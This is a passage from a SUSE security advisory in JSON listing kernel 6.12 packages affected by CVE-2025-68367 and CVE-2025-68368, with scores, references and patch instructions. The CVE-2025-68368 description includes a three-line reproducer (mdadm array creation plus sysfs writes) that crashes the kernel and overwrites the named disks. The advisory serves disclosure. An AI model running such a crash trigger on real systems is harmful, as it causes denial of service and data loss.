"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68368",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68368"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: init bioset in mddev_init\n\nIO operations may be needed before md_run(), such as updating metadata\nafter writing sysfs. Without bioset, this triggers a NULL pointer\ndereference as below:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000020\n Call Trace:\n md_update_sb+0x658/0xe00\n new_level_store+0xc5/0x120\n md_attr_store+0xc9/0x1e0\n sysfs_kf_write+0x6f/0xa0\n kernfs_fop_write_iter+0x141/0x2a0\n vfs_write+0x1fc/0x5a0\n ksys_write+0x79/0x180\n __x64_sys_write+0x1d/0x30\n x64_sys_call+0x2818/0x2880\n do_syscall_64+0xa9/0x580\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nReproducer\n```\n mdadm -CR /dev/md0 -l1 -n2 /dev/sd[cd]\n echo inactive \u003e /sys/block/md0/md/array_state\n echo 10 \u003e /sys/block/md0/md/new_level\n```\n\nmddev_init() can only be called once per mddev, no need to test if bioset\nhas been initialized anymore.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
